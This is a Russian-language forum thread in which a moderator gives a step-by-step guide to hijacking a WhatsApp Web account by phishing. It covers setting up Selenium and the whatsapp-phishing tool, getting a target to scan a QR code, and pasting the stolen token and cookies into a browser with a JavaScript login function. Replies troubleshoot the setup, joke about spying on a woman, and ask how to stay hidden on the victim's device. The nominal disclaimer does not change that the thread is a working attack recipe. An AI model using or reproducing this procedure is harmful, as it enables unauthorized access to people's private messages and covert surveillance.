Hack WhatsApp (Phishing)

Тема в разделе "Этичный хакинг и тестирование на проникновение", создана пользователем Vander, 18 окт 2016.

Метки:
  1. Vander

    Vander Модератор
    Команда форума Grey Team

    Регистрация:
    16 янв 2016
    Сообщения:
    335
    Симпатии:
    315
    Приветствую! В этой статье пойдет речь о взломе, мессенджера WhatsApp.

    upload_2016-10-18_21-15-48.png

    Для начала, немного истории, не так давно (вроде бы, весной 2016) компания объявила, о том, что вся переписка и личные данные защищены методом «Сквозного шифрования», вот как о нем говорит сама компания:

    Сквозное шифрование доступно, в случае если вы и ваши собеседники используете последние версии WhatsApp. Сквозное шифрование гарантирует, что только вы и человек, с которым вы общаетесь, можете прочитать содержимое, и никто кроме Вас. Все сообщения защищены уникальным замком. Только у адресата и у вас есть специальный ключ, который необходим, чтобы разблокировать и прочитать сообщения. Для дополнительной защиты каждое сообщение, которое вы отправляете, имеет уникальный замок и ключ. Все это происходит автоматически: вам не нужно настраивать параметры или создавать специальные секретные чаты, чтобы обеспечить защиту сообщений. Отключить сквозное шифрование невозможно.

    Даже администрация мессенджера не в силах расшифровать Ваши данные. Это, безусловно, шикарная новость для пользователей. Но, как известно, безопасность - это иллюзия. Далее будет описан взлом с использованием фишинга.

    Начнем.

    Во-первых, необходимо скачать Selenium, jar файл отсюда => http://www.seleniumhq.org/download/

    upload_2016-10-18_21-16-34.png

    Selenium Server – это сервер, который позволяет управлять браузером с удалённой машины, по сети. На той машине, где должен работать браузер, устанавливается и запускается сервер. Затем на другой машине запускается программа, которая, используя специальный драйвер RemoteWebDriver, соединяется с сервером и отправляет ему команды. Затем запускает браузер и выполняет в нём эти команды, используя драйвер, соответствующий этому браузеру.

    Затем перейдем в папку, куда он был скачан:

    > cd Загрузки/

    upload_2016-10-18_21-18-10.png

    > chmod a+x (позволим файлу исполнение)

    > ./selenium-server-standalone-3.0.0-beta4.jar (стартуем сервер)

    upload_2016-10-18_21-19-20.png

    Не исключаю, что для корректной работы сервера потребуется geckodriver, его можно взять отсюда:

    upload_2016-10-18_21-20-0.png

    Теперь необходимо получить утилиту whatsapp-phishing, откроем новое окно терминала и напишем:

    > git clone https://github.com/Mawalu/whatsapp-phishing.git

    Затем перейдем в папку с whatsapp-phishing:

    > cd whatsapp-phishing

    И внимательно выполняем следующие команды:

    > npm install

    npm(Node.js Package Manager) — менеджер пакетов, входящий в состав Node.js.

    Эта команда позволит установить все необходимое, Node.js и Socket.io, которые требуются для запуска веб-сайта и сервера Selenium. Если в процессе вы столкнулись с выводами команды - "Missing", то можно установить все вручную по порядку:

    > npm install node.js

    > npm install socket.io

    > npm install wd

    После того, как все необходимое было установлено, вводим в терминале следующую команду:

    > nodejs index.js

    В случае если вы все сделали правильно, увидите такой вывод:

    upload_2016-10-18_21-21-53.png

    Теперь, перейдя по ссылке в браузере – localhost:8080, видим это:

    upload_2016-10-18_21-22-54.png

    Выделенный QR необходимо доставить целевому устройству. Затем оно должно просканировать его своим приложением WhatsApp. Когда все сделано, WhatsApp аутентифицирует браузер, который управляется Selenserver и позволит получать token и document.cookie от целевой системы.

    Итак, после того, QR был просканирован, можно скопировать token и document.cookie.

    Перейдем в терминал, где запущен whatsapp-phishing и скопируем оттуда следующие строки:

    upload_2016-10-18_21-23-52.png

    Предлагаю запустить новую вкладку браузера в режиме «приват». В ней перейдем на сайт web.whatsapp.com.

    upload_2016-10-18_21-24-50.png

    Затем, на этой вкладке откроем режим разработчика:

    upload_2016-10-18_21-25-20.png

    Пишем в строке:

    > var t= (затем копируем сюда код из консоли whatsapp-phishing)

    upload_2016-10-18_21-26-6.png
    upload_2016-10-18_21-26-24.png

    Необходимо очень внимательно это делать, так как синтаксис будет ругаться на скопированные пробелы и т.д.

    Затем пишем руками код следующего содержания:

    > function login(token) {Object.keys(token.s).forEach(function (key) {localStorage.setItem(key, token.s[key])}); token.c = token.c.split(‘;’); token.c.forEach(function(cookie) {document.cookie = cookie; });}

    Жмем enter, и последняя команда:

    > login (t)

    Теперь перезагрузим вкладку браузера, результатом будет доступ к аккаунту устройства, которое просканировало наш QR в начале.

    upload_2016-10-18_21-27-44.png

    Спасибо за внимание. Данная публикация не является руководством к действию и предоставлена исключительно для ознакомления.
     
    #1 Vander, 18 окт 2016
    Последнее редактирование: 18 окт 2016
    The_Doc, gx6060, Raj_Hack и 5 другим нравится это.
  2. kuklofon

    kuklofon Parrot Security OS
    Команда форума Grey Team

    Регистрация:
    28 фев 2016
    Сообщения:
    221
    Симпатии:
    119
    АТЛИЧНА! Твои статьи прям приятно читать и репостить ))))
     
    Vander нравится это.
  3. Vander

    Vander Модератор
    Команда форума Grey Team

    Регистрация:
    16 янв 2016
    Сообщения:
    335
    Симпатии:
    315
    :) Спасибо
     
  4. d7uk4r3v

    d7uk4r3v Kali Linux
    Grey Team

    Регистрация:
    22 апр 2016
    Сообщения:
    42
    Симпатии:
    9
    Шикарно. Благодарю за изложенный материал)
     
  5. Inject0r

    Inject0r Active Member

    Регистрация:
    3 сен 2016
    Сообщения:
    33
    Симпатии:
    9
    Интересная статья, сохраню в свою копилку! :) Правда зачем вообще QR использовать? Вот сколько я WhatApp пользуюсь, никогда не занимался сканированием каких-то кодов через него! Для чего это вообще нужно? Это к тому как убедить простого рядового человека просканировать фишинговый код.
     
  6. MAdDog719

    MAdDog719 Well-Known Member
    Grey Team

    Регистрация:
    16 авг 2016
    Сообщения:
    104
    Симпатии:
    20
    Ну все!!! Буду шпионить за женщиной. Шучу.
    Отличная статья, спасибо.
     
  7. Vander

    Vander Модератор
    Команда форума Grey Team

    Регистрация:
    16 янв 2016
    Сообщения:
    335
    Симпатии:
    315
    Это для общего развития статья)) А не конкретная инструкция.
     
  8. Matvey

    Matvey Member

    Регистрация:
    11 окт 2016
    Сообщения:
    5
    Симпатии:
    1
    ругается на geckodriver , что делать с ним?
    Скачал с репозитории , что дальше?
     
  9. Inject0r

    Inject0r Active Member

    Регистрация:
    3 сен 2016
    Сообщения:
    33
    Симпатии:
    9
    Vander, помоги пожалуйста :)

    не совсем понятно как связать geckodriver с системой. Скачал его, установил, даже запустил командой ./geckodriver -b /usr/bin/firefox. Драйвер пишет, что Listening on 127.0.0.1:4444. Вот непонятно куда этот порт привязать? Кто должен сюда подключиться? Этот адрес прописать как прокси в мозиле? Или что? В любом случае у меня при подключении к http://localhost:8080/ появляется только одна надпись: LOADING
     
  10. Matvey

    Matvey Member

    Регистрация:
    11 окт 2016
    Сообщения:
    5
    Симпатии:
    1
    Такая же проблема при подключение на localhost:8080 запись LOADING и ошибка в standalone server ( The path to the driver executable must be set by the webdriver.gecko.driver system property )
     
  11. Vander

    Vander Модератор
    Команда форума Grey Team

    Регистрация:
    16 янв 2016
    Сообщения:
    335
    Симпатии:
    315
    Привет! Извини за задержку с ответом! Разобрался что к чему?
     
  12. Vander

    Vander Модератор
    Команда форума Grey Team

    Регистрация:
    16 янв 2016
    Сообщения:
    335
    Симпатии:
    315
    Привет, есть скрины?
     
  13. Inject0r

    Inject0r Active Member

    Регистрация:
    3 сен 2016
    Сообщения:
    33
    Симпатии:
    9
    Привет, не разобрался, бросил процесс на этом этапе :) Разъясни если можешь)
     
  14. Vander

    Vander Модератор
    Команда форума Grey Team

    Регистрация:
    16 янв 2016
    Сообщения:
    335
    Симпатии:
    315
    У меня есть свежая 2016.2, сейчас проапдейтю ее, и попробую сначала до конца по порядку пройти
     
  15. MonMJK

    MonMJK Member

    Регистрация:
    27 ноя 2016
    Сообщения:
    10
    Симпатии:
    2
    А вот скажите а как скрыть свое присутствие в устроистве?
     
Загрузка...

Поделиться этой страницей